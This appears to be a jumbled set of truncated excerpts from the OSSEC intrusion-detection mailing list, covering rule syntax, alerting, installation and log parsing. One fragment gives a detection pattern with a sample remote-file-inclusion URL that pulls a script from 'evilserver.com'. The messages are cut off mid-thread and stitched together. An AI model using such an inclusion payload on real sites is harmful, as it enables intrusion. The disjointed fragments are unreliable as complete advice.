We've got a machine running FreeBSD 6.2 and Ossec 1.6 and I'm seeing a
whole heap of SSH brute force attacks occurring on it. Ossec is
emailing me all of the attempts and adding the offending IP to the end
of FreeBSD's hosts.allow file.
This machine lets me and the team SSH from anywhere and so
Thank you Peter and Daniel.
I will give it a go.
Cheers.
Andy
On Oct 10, 5:48 am, Daniel Cid [EMAIL PROTECTED] wrote:
Hi Andy,
You can also use the hostname tag in the rules to match on the log file
name:
<rule id="12" level="13">
  <match>$HACK_ATTEMPT</match>
  <hostname>/var/spool/mail
Hi,
We're currently running version 1.4.
Are there any problems with upgrading from 1.4 straight to 1.6?
Thanks.
Andy
Hi All,
We've had some recent joomla and mambo exploits on our web server
through applets that customers can add/install themselves. We've been
able to trace some activity back to the /var/spool/mail/apache file
and I've added this file for ossec to monitor. I've placed a rule in
local_rules.xml
Dear all,
I wish to know how to increase frequency of sending raw log from agent
to ossec server.
thank you in advance ;-)
Panom N.
Dear all,
Is it possible to monitor Mandrake Linux logs? I could not see
Mandrake in the platforms/operating systems supported page.
thank you in advance ;-)
Panom N.
Dear all,
Please help me on how to provide high availability, active-active or
active-standby, to OSSEC solution. I need to focus on client
server ;-)
thank you in advance
Panom N.
accept parsed logs as evidence).
Please let me know.
Thanks.
On Nov 15, 2007 9:01 AM, Aaron Bliss [EMAIL PROTECTED] wrote:
It looks like I'm receiving events from the remote syslog host, I just
didn't realize that I need to configure e-mail alerts for the remote
host as well. So again
sudo apt-get install build-essential
Shige wrote:
Hello guys, i need some help.
First of all, I'm a beginner using ossec.
I'm trying to install ossec-hids on a machine running Ubuntu 6.06, but when I
finish the installation an error occurred:
./install.sh: Line 85: make: command not found
Error
Thanks heap...i should have spotted that myself :)
Thanks for your help Daniel.
OSSEC is a great product so keep up the good work!
. That's why it
was written for :)
Thanks,
--
Daniel B. Cid
dcid ( at ) ossec.net
On 10/10/07, Wilson Lai [EMAIL PROTECTED] wrote:
Dear ALL,
I have now installed the Syslog-NG server for centralizing all
syslog messages from windows
and linux machines. And now, I am looking
Hi There,
We've installed OSSEC as a local install on every server so far and
did not use the server/agent model. This might have been a bad move
because we have all our servers running a local install of OSSEC and
we want to now have a central management system so that white lists
can easily be
Hi There,
Just fine tuning OSSEC and need a bit of help understanding why a
particular rule was fired to trigger Active Response.
Turns out that we like Peter's idea of just firing Active Response
based on the rules we set.
At least this way we know which rules are being matched to trigger Active
Thank you Daniel...
Works great !!
Thanks for the explanation Daniel.
Although it's good to enable active response for just the rules you
want - is there a way to do the opposite that allows you to add a rule
that won't fire off active response (like an exception list).
For example I am getting a lot of web customers who have embedded
javascript code in their HTML
Yes it is.
Try adding something like this to your ossec.conf file.
<email_alerts>
  <email_to>[EMAIL PROTECTED],[EMAIL PROTECTED]</email_to>
  <rule_id>12</rule_id>
  <do_not_delay />
  <do_not_group />
</email_alerts>
On Sep 21, 5:08 pm, Verlag Neue Stadt [EMAIL PROTECTED] wrote:
Hello
Adding to this discussion, is it possible to have one particular rule
ID email me at [EMAIL PROTECTED] and not email the default email
address [EMAIL PROTECTED]
I've applied the following rules below to ossec.conf and it's working
ok but I'm getting two emails - one is sent to [EMAIL PROTECTED
build-essential
Thomas Wagner wrote:
I've a new etch image. I get many faults during the installation of
ossec. I guess some tools and libs are missing. Can you tell me
which are necessary for ossec?
thanks
tom
Hi...
I posted on here about my ProFTPD problem a week or so ago but it did
not appear in the discussion list.
Is there a way to make OSSEC less sensitive with ProFTPD logs?
What I've found is that when a user FTPs to our web server and uses
the correct/valid username but types the password
[**]
[Priority: 3]
09/06-12:38:49.408268 74.230.55.39:50557 - 172.19.255.3:80
TCP TTL:113 TOS:0x0 ID:63541 IpLen:20 DgmLen:1400 DF
***A Seq: 0x7F99D7C5 Ack: 0x57936D25 Win: 0x4A60 TcpLen: 20
On Aug 31, 1:03 pm, Zachary Roetemeyer [EMAIL PROTECTED] wrote:
I am launching two instances of snort
Refer to this thread about a similar discussion:
http://groups.google.com/group/ossec-list/browse_thread/thread/f78e998efb3c108b
Below is a snip from the thread above which shows you the sequence
numbers.
Here I have enabled service sequence-numbers on the router. From the
log file, you can
Because I can't get Ossec to properly work with Cisco IOS logs I've
opted to use local_rules.xml and place my rules in there.
<rule id="12" level="5">
  <match>%SYS-5-CONFIG_I</match>
  <description>Configuration change detected.</description>
</rule>
<rule id="13" level="7">
I'd say false positive as the package flex installs libfl.so to
/usr/lib, but you can check your md5 hash against mine, I'm running etch
with flex 2.5.33-11 installed.
:~$ stat /usr/lib/libfl.so
File: `/usr/lib/libfl.so'
Size: 773 Blocks: 8 IO Block: 4096 regular
I want to log in OSSEC (in alert.log)
/var/log/kern.log
Jan 31 21:52:55 gatlan kernel: DROP
TRACEROUTE IN=ppp0 OUT= MAC= SRC="" DST=90.20.131.158 LEN=80
TOS=0x00 PREC=0xC0 TTL=248 ID=3575 PROTO=ICMP TYPE=3 CODE=1
[SRC="" DST=192.168.1.64 LEN=52 TOS=0x00 PREC=0x00 TTL=54
ID=8857 DF PROTO=TCP
I have a problem when OSSEC logs the iptables log
Feb 1 17:47:41 gatlan kernel: DROP
ICMP_ERROR IN=ppp0 OUT= MAC= SRC="" DST=90.20.131.158
LEN=94 TOS=0x00 PREC=0x00 TTL=44 ID=59875 PROTO=ICMP TYPE=3 CODE=1
[SRC="" DST=192.168.11.2 LEN=66 TOS=0x00 PREC=0x00 TTL=43
ID=47914 PROTO=UDP SPT=9689
Rafael Capovilla wrote:
What do you mean?
firewall-drop.sh works just fine with iptables/pf/ipfw
no, an iptables log that works with OSSEC (just a sample) (like apache,
syslog...)
2007/1/25, [EMAIL PROTECTED]:
Hello, is it possible to have a sample script for iptables that works on OSSEC?
[EMAIL PROTECTED] wrote:
[EMAIL PROTECTED] wrote:
on web_rules.xml (add ~ line 46)
<url>%3A|%2F|:|//</url>
to block, as an XSS attack or a SQL attack, a log of the type:
http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
http://mywebsite.com
hello,
I have a problem with Apache2 Access Log, (but not with Error Log)
/* ossec.conf
<localfile>
  <log_format>apache</log_format>
  <location>/var/log/apache2/access_mywebsite.com.log</location>
</localfile>
*/
---
/* /var/log/apache2/access_mywebsite.com.log (rights: root:root)
123.123.123.123 -
whatever rogue process that binds to
it can be configured so that it only syn-ack's to a specific IP, or
require specific packets.
I'd still push my tcpdump method, watching for any outgoing traffic
that shouldn't be there.
On Jan 18, 10:06 pm, Thorne Lawler [EMAIL PROTECTED] wrote:
Edvin,
I